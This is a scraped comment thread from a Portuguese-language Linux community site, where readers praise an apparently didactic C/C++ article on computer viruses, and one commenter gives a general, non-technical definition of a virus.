Mas falando serio é isso ae, vou até estudar um pouco mais , pq este lance de C/C++ parece ser demais ;)
Grande abraço
asuhhusahashuhusa
Estou ainda em estruturas de dados e ainda sou normal, husahusahu to longe de sabe tudo hsuahusahusa
Mas falando serio é isso ae, vou até estudar um pouco mais , pq este lance de C/C++ parece ser demais ;)
Grande abraço
[20] Comentário enviado por tsanches em 16/07/2008 - 18:23h
Muito Interessante sua idéria, Parabéns, artigo muito bem elaborado didaticamente, ja ganhou a camisa :-)
grj_rj = favoritos
Um grande abraço
TSANCHES
Muito Interessante sua idéria, Parabéns, artigo muito bem elaborado didaticamente, ja ganhou a camisa :-)
grj_rj = favoritos
Um grande abraço
TSANCHES
[21] Comentário enviado por leoberbert em 16/07/2008 - 21:01h
Passando para dizer que seu artigo está muito bom e bem explicado. Parabéns pela sua didática quanto ao mesmo.
[]' Leo.
Passando para dizer que seu artigo está muito bom e bem explicado. Parabéns pela sua didática quanto ao mesmo.
[]' Leo.
[22] Comentário enviado por ruhanbidart em 16/07/2008 - 22:52h
Excelente artigo, boa didática e parabéns pela inovação em relação ao assunto.
Excelente artigo, boa didática e parabéns pela inovação em relação ao assunto.
[23] Comentário enviado por gersonraymond em 18/07/2008 - 08:59h
Parabéns pelo belo artigo, pois faz bastante tempo que não vejo algo parecido. Já pensou em publicar um livro, seguindo esta linha de aplicação você terá um grande sucesso e superará diversos livros que estão no mercado com conteúdos super vazios, um abraço.
Parabéns pelo belo artigo, pois faz bastante tempo que não vejo algo parecido. Já pensou em publicar um livro, seguindo esta linha de aplicação você terá um grande sucesso e superará diversos livros que estão no mercado com conteúdos super vazios, um abraço.
[24] Comentário enviado por gjr_rj em 18/07/2008 - 10:24h
Publicar um livro !
rsrsrsrs
Quem iria publicar um livro escrito por mim ?
rsrsrsrs
Pensar, já pensei, na época não era nem sobre esse assunto.
De qualquer forma, não saberia quem procurar.
Publicar um livro !
rsrsrsrs
Quem iria publicar um livro escrito por mim ?
rsrsrsrs
Pensar, já pensei, na época não era nem sobre esse assunto.
De qualquer forma, não saberia quem procurar.
[25] Comentário enviado por gilicraft em 18/07/2008 - 15:15h
comecei no linux mandriva hoje, eu estou tentando migrar para o linux e comecei a ler tudo que aparecia no google, achei interessante o seu artigo e queria tirar umas duvidas, se vc poder me ajudar poderia poracaso me dizer como eu desligo a permissao de escrita de uma pasta ou dos arquivos de uma pasta? grato e parabens pelo artigo
comecei no linux mandriva hoje, eu estou tentando migrar para o linux e comecei a ler tudo que aparecia no google, achei interessante o seu artigo e queria tirar umas duvidas, se vc poder me ajudar poderia poracaso me dizer como eu desligo a permissao de escrita de uma pasta ou dos arquivos de uma pasta? grato e parabens pelo artigo
[26] Comentário enviado por SamL em 07/04/2009 - 17:31h
"Quem iria publicar um livro escrito por mim ?"
Publicar eu não sei, mas eu compraria.
Parabens pelo Artigo.
vlw!
"Quem iria publicar um livro escrito por mim ?"
Publicar eu não sei, mas eu compraria.
Parabens pelo Artigo.
vlw!
[27] Comentário enviado por removido em 07/11/2009 - 12:21h
nao acabei de ler tudo, mas ja ta nos meus favoritos, ainda estou aprendendo programação, e nao estou conseguindo entender tudo isso, depois vou reler tudo isso
parabens, otimo artigo
nao acabei de ler tudo, mas ja ta nos meus favoritos, ainda estou aprendendo programação, e nao estou conseguindo entender tudo isso, depois vou reler tudo isso
parabens, otimo artigo
[29] Comentário enviado por georgekihoma em 11/07/2010 - 11:16h
Cara, primeiro acho que qualquer gerente de redes/segurança deve conhecer esses assuntos. Dito isto, considero que a definição de vírus deve contemplar o fato de que existe:
1 - Infecção de algum tipo de arquivo ou setor de boot (MBR)
2 - Após a infecção, a execução/abertura do arquivo ou inicialização do computador significam a replicação do vírus.
3 - Propagação (via rede, pendrive, mail, etc)
As ações específicas do vírus dependem do que o programador deseja fazer. Se for um vírus destrutivo ele pode apagar dados, destruir a MBR, ou no caso do Chernobyl, apagar as informações do CMOS.
Por isso é interessante que um gerente de segurança/redes saiba fazer a distinção entre vírus, trojans, malware, spyware.
Cara, primeiro acho que qualquer gerente de redes/segurança deve conhecer esses assuntos. Dito isto, considero que a definição de vírus deve contemplar o fato de que existe:
1 - Infecção de algum tipo de arquivo ou setor de boot (MBR)
2 - Após a infecção, a execução/abertura do arquivo ou inicialização do computador significam a replicação do vírus.
3 - Propagação (via rede, pendrive, mail, etc)
As ações específicas do vírus dependem do que o programador deseja fazer. Se for um vírus destrutivo ele pode apagar dados, destruir a MBR, ou no caso do Chernobyl, apagar as informações do CMOS.
Por isso é interessante que um gerente de segurança/redes saiba fazer a distinção entre vírus, trojans, malware, spyware.
[30] Comentário enviado por luandemattos em 04/11/2010 - 22:08h
Muito Bom mesmo!
Principalmente para quem está começando, e o código comentado,muito bom mesmo.
Muito Bom mesmo!
Principalmente para quem está começando, e o código comentado,muito bom mesmo.
[32] Comentário enviado por evamberto em 06/04/2011 - 20:50h
muito bom.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
muito bom.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[33] Comentário enviado por NewWave em 14/04/2013 - 10:48h
Olá, amigo!
Em primeiro lugar, parabéns pelo artigo. Ainda nem terminei de ler, mas já estou vendo que é um artigo de primeira!
Eu estou me baseando nele para um seminário que eu tenho que apresentar na faculdade.
Só dando uma humilde contribuição: a função fork() precisa da biblioteca unistd.h, portanto, #include <unistd.h>.
Muito obrigado pela ajuda!
Bom domingo.
Olá, amigo!
Em primeiro lugar, parabéns pelo artigo. Ainda nem terminei de ler, mas já estou vendo que é um artigo de primeira!
Eu estou me baseando nele para um seminário que eu tenho que apresentar na faculdade.
Só dando uma humilde contribuição: a função fork() precisa da biblioteca unistd.h, portanto, #include <unistd.h>.
Muito obrigado pela ajuda!
Bom domingo.
Patrocínio
Site hospedado pelo provedor RedeHost.
Destaques
Artigos
Compartilhando a tela do Computador no Celular via Deskreen
Como Configurar um Túnel SSH Reverso para Acessar Sua Máquina Local a Partir de uma Máquina Remota
Configuração para desligamento automatizado de Computadores em um Ambiente Comercial
Dicas
Como renomear arquivos de letras maiúsculas para minúsculas
Imprimindo no formato livreto no Linux
Vim - incrementando números em substituição
Efeito "livro" em arquivos PDF
Como resolver o erro no CUPS: Unable to get list of printer drivers
Tópicos
Não to conseguindo resolver este problemas ao instalar o playonelinux (1)
Excluir banco de dados no xampp (1)
Top 10 do mês
-
Xerxes
1° lugar - 65.418 pts -
Fábio Berbert de Paula
2° lugar - 50.631 pts -
Buckminster
3° lugar - 17.369 pts -
Mauricio Ferrari
4° lugar - 15.337 pts -
Alberto Federman Neto.
5° lugar - 14.084 pts -
Diego Mendes Rodrigues
6° lugar - 13.393 pts -
Daniel Lara Souza
7° lugar - 12.738 pts -
edps
8° lugar - 10.765 pts -
Alessandro de Oliveira Faria (A.K.A. CABELO)
9° lugar - 10.599 pts -
Andre (pinduvoz)
10° lugar - 10.437 pts
Scripts
[Python] Automação de scan de vulnerabilidades
[Python] Script para analise de superficie de ataque
[Shell Script] Novo script para redimensionar, rotacionar, converter e espelhar arquivos de imagem
[Shell Script] Iniciador de DOOM (DSDA-DOOM, Doom Retro ou Woof!)
[Shell Script] Script para adicionar bordas às imagens de uma pasta
A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.
Site hospedado por:
